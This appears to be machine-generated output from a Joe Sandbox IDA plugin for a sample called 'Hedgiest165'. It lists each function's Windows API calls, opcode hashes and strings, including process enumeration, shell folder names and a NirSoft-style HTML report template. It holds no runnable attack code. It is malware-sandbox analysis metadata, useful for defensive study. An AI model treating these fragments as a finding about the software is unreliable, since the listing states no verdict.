                                                                        • API String ID: 2012295524-70141382
                                                                        • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                        • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                        • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                        • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                        • API String ID: 667068680-3953557276
                                                                        • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                        • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                        • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                        • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 004121FF
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                        • SelectObject.GDI32(?,?), ref: 00412251
                                                                        • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                        • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                          • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                          • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                          • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                        • SetCursor.USER32(00000000), ref: 004122BC
                                                                        • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                        • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1700100422-0
                                                                        • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                        • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                        • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                        • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 004111E0
                                                                        • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                        • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                        • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                        • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                        • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                        • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                        • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                        • String ID:
                                                                        • API String ID: 552707033-0
                                                                        • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                        • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                        • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                        • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                          • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                          • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                        • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                        • strchr.MSVCRT ref: 0040C140
                                                                        • strchr.MSVCRT ref: 0040C151
                                                                        • _strlwr.MSVCRT ref: 0040C15F
                                                                        • memset.MSVCRT ref: 0040C17A
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                        • String ID: 4$h
                                                                        • API String ID: 4066021378-1856150674
                                                                        • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                        • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                        • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                        • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_snwprintf
                                                                        • String ID: %%0.%df
                                                                        • API String ID: 3473751417-763548558
                                                                        • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                        • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                        • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                        • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                        • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                        • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                        • GetTickCount.KERNEL32 ref: 0040610B
                                                                        • GetParent.USER32(?), ref: 00406136
                                                                        • SendMessageW.USER32(00000000), ref: 0040613D
                                                                        • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                        • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                        • String ID: A
                                                                        • API String ID: 2892645895-3554254475
                                                                        • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                        • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                        • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                        • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                        APIs
                                                                        • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                          • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                          • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                          • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                          • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                        • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                        • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                        • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                        • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                        • memset.MSVCRT ref: 0040DA23
                                                                        • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                        • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                        • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                          • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                        • String ID: caption
                                                                        • API String ID: 973020956-4135340389
                                                                        • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                        • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                        • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                        • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                        APIs
                                                                        Strings
                                                                        • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_snwprintf$wcscpy
                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                        • API String ID: 1283228442-2366825230
                                                                        • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                        • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                        • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                        • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                        APIs
                                                                        • wcschr.MSVCRT ref: 00413972
                                                                        • wcscpy.MSVCRT ref: 00413982
                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                        • wcscpy.MSVCRT ref: 004139D1
                                                                        • wcscat.MSVCRT ref: 004139DC
                                                                        • memset.MSVCRT ref: 004139B8
                                                                          • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                          • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                        • memset.MSVCRT ref: 00413A00
                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                        • wcscat.MSVCRT ref: 00413A27
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                        • String ID: \systemroot
                                                                        • API String ID: 4173585201-1821301763
                                                                        • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                        • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                        • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                        • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: wcscpy
                                                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                        • API String ID: 1284135714-318151290
                                                                        • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                        • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                        • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                        • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                        • wcscpy.MSVCRT ref: 0040D1B5
                                                                          • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                          • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                        • wcslen.MSVCRT ref: 0040D1D3
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                        • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                        • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                        • String ID: 8o`$@s`$strings
                                                                        • API String ID: 3166385802-3639545920
                                                                        • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                        • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                        • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                        • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                        • String ID: 0$6
                                                                        • API String ID: 4066108131-3849865405
                                                                        • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                        • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                        • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                        • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004082EF
                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                        • memset.MSVCRT ref: 00408362
                                                                        • memset.MSVCRT ref: 00408377
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memset$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 290601579-0
                                                                        • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                        • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                        • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                        • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: free$wcslen
                                                                        • String ID:
                                                                        • API String ID: 3592753638-3916222277
                                                                        • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                        • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                        • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                        • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040A47B
                                                                        • _snwprintf.MSVCRT ref: 0040A4AE
                                                                        • wcslen.MSVCRT ref: 0040A4BA
                                                                        • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                        • wcslen.MSVCRT ref: 0040A4E0
                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2793853011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000007.00000002.2793853011.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        • Associated: 00000007.00000002.2793853011.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: memcpywcslen$_snwprintfmemset
                                                                        • String ID: %s (%s)$YV@
                                                                        • API String ID: 3979103747-598926743
                                                                        • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                        • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                        • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                        • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                        • wcslen.MSVCRT ref: 0040A6B1
